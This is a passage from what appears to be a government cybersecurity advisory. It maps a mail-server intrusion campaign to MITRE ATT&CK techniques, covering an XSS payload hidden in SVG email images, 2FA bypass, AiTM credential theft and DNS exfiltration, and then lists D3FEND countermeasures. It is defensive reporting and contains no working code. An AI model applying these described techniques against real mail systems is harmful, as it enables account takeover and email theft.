<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank"><u>T1588.007</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group appears to have leveraged AI to support development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stage Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1608/" target="_blank"><u>T1608</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Flowerbed is deployed to a procured server in the cloud. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 11: Initial Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Trusted Relationship </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank"><u>T1199</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Phishing </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank"><u>T1566</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The actors used spear phishing to lure users into opening malicious email. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 12: Execution </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exploitation for Client Execution </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank"><u>T1203</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>An XSS vulnerability was leveraged to execute the JavaScript payload. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 13: Persistence </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Manipulation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank"><u>T1098</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Enabling IMAP and Application Passcodes provides persistent access to the compromised account. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 14: Privilege Escalation </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.  </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 15: Stealth </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Command Obfuscation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank"><u>T1027.010</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Encrypted/Encoded File </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank"><u>T1027.013</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: SVG Smuggling </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank"><u>T1027.017</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload was contained in an “onload” attribute within an SVG image included in the malicious email. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Use Alternate Authentication Material: Web Session Cookie </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank"><u>T1550.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 16: Credential Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Adversary-in-the-Middle </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank"><u>T1557</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 17: Collection </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Data Staged: Remote Data Staging </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank"><u>T1074.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
